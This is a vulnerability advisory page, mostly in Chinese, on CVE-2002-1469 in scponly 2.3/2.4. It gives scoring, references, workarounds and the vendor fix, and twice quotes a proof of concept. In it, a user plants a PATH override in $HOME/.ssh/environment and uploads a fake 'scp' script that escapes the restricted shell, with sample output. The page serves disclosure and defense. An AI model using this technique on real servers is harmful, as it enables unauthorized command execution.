CVE-2002-1469
CVSS7.5
发布时间 :2003-04-22 00:00:00
修订时间 :2008-09-05 16:30:40
NMCOES    

[原文]scponly does not properly verify the path when finding the (1) scp or (2) sftp-server programs, which could allow remote authenticated users to bypass access controls by uploading malicious programs and modifying the PATH variable in $HOME/.ssh/environment to locate those programs.


[CNNVD]scponly执行路径处理不正确漏洞(CNNVD-200304-123)

        
        scponly是一款可替代SHELL系统,可提供帐户在不需要SHELL访问的情况下进行scp和sftp操作。
        scponly的scp和sftp程序在执行的时候没有正确地验证路径,远程攻击者可以利用这个漏洞在能上载文件的情况下执行任意命令。
        scponly对scp和sftp可执行程序在执行前没有验证其实际路径,而且使用system()不安全的调用。如果服务器管理员没有限制用用户.ssh目录的访问,攻击者可以上载文件到$HOME/.ssh/environment用户环境中,并更改为scp或者sftp程序名,当此SSH环境用户调用scp或者sftp程序时,可导致伪造scp或者sftp文件中的恶意代码以用户进程权限执行。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:scponly:scponly:2.3
cpe:/a:scponly:scponly:2.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1469
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1469
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-123
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5526
(VENDOR_ADVISORY)  BID  5526
http://www.iss.net/security_center/static/9913.php
(VENDOR_ADVISORY)  XF  scponly-ssh-env-upload(9913)
http://online.securityfocus.com/archive/1/288245
(VENDOR_ADVISORY)  BUGTRAQ  20020820 vulnerabilities in scponly
http://www.sublimation.org/scponly/
(UNKNOWN)  CONFIRM  http://www.sublimation.org/scponly/

- 漏洞信息

scponly执行路径处理不正确漏洞
高危 配置错误
2003-04-22 00:00:00 2005-05-13 00:00:00
本地  
        
        scponly是一款可替代SHELL系统,可提供帐户在不需要SHELL访问的情况下进行scp和sftp操作。
        scponly的scp和sftp程序在执行的时候没有正确地验证路径,远程攻击者可以利用这个漏洞在能上载文件的情况下执行任意命令。
        scponly对scp和sftp可执行程序在执行前没有验证其实际路径,而且使用system()不安全的调用。如果服务器管理员没有限制用用户.ssh目录的访问,攻击者可以上载文件到$HOME/.ssh/environment用户环境中,并更改为scp或者sftp程序名,当此SSH环境用户调用scp或者sftp程序时,可导致伪造scp或者sftp文件中的恶意代码以用户进程权限执行。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 限制用户的环境,如管理员可设置用户HOME目录为不可写目录。
        * 修改代码,判断正确路径和以execv()来执行程序,"Derek D. Martin" <ddm@pizzashack.org>提供了如下第三方程序:
        
        http://www.pizzashack.org/rssh/

        厂商补丁:
        scponly
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.sublimation.org/scponly/

- 漏洞信息 (21732)

SCPOnly 2.3/2.4 SSH Environment Shell Escaping Vulnerability (EDBID:21732)
linux local
2002-08-20 Verified
0 Derek D. Martin
N/A [点击下载]
source: http://www.securityfocus.com/bid/5526/info

scponly is a freely available, open source restricted secure copy client. It is available for Unix and Linux operating systems.

The default installation of scponly does not place sufficient access controls on the .ssh subdirectory. Due to this oversight, it is possible for a remote user to upload files which may allow command execution. This could lead to unintended command execution, and regular shell access to a vulnerable host.

For example, the user could scp the following to
$HOME/.ssh/environment:

# ssh environment
PATH=/home/myhomedir/:/usr/bin:/bin
#end

Subsequently, the user could upload the following file to their home
directory, and call it scp:

#!/bin/sh

echo "I'm a bad boy" > /tmp/exploit
/usr/bin/scp $@

# end

When they next scp a file:

[root@restricted /tmp]
# ls -l
total 24
-rw-r--r-- 1 bonehead bonehead 14 Aug 19 22:46 exploit
[root@restricted /tmp]
# cat exploit
I'm a bad boy		

- 漏洞信息

9564
scponly SSH Path Environment Subversion Privilege Escalation

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-08-19 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SCPOnly SSH Environment Shell Escaping Vulnerability
Configuration Error 5526
No Yes
2002-08-20 12:00:00 2009-07-11 03:56:00
Vulnerability discovery credited to Derek D. Martin <ddm@pizzashack.org>.

- 受影响的程序版本

scponly scponly 2.4
scponly scponly 2.3

- 漏洞讨论

scponly is a freely available, open source restricted secure copy client. It is available for Unix and Linux operating systems.

The default installation of scponly does not place sufficient access controls on the .ssh subdirectory. Due to this oversight, it is possible for a remote user to upload files which may allow command execution. This could lead to unintended command execution, and regular shell access to a vulnerable host.

- 漏洞利用

The following was provided by Derek D. Martin &lt;ddm@pizzashack.org&gt;:

For example, the user could scp the following to
$HOME/.ssh/environment:

# ssh environment
PATH=/home/myhomedir/:/usr/bin:/bin
#end

Subsequently, the user could upload the following file to their home
directory, and call it scp:

#!/bin/sh

echo "I'm a bad boy" &gt; /tmp/exploit
/usr/bin/scp $@

# end

When they next scp a file:

[root@restricted /tmp]
# ls -l
total 24
-rw-r--r-- 1 bonehead bonehead 14 Aug 19 22:46 exploit
[root@restricted /tmp]
# cat exploit
I'm a bad boy

- 解决方案

The vendor has provided the following fix information:

Each user with scponly as his or her shell must have an immutable home directory and .ssh subdirectory to prevent a user from using ssh config parameters to undermine the shell.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站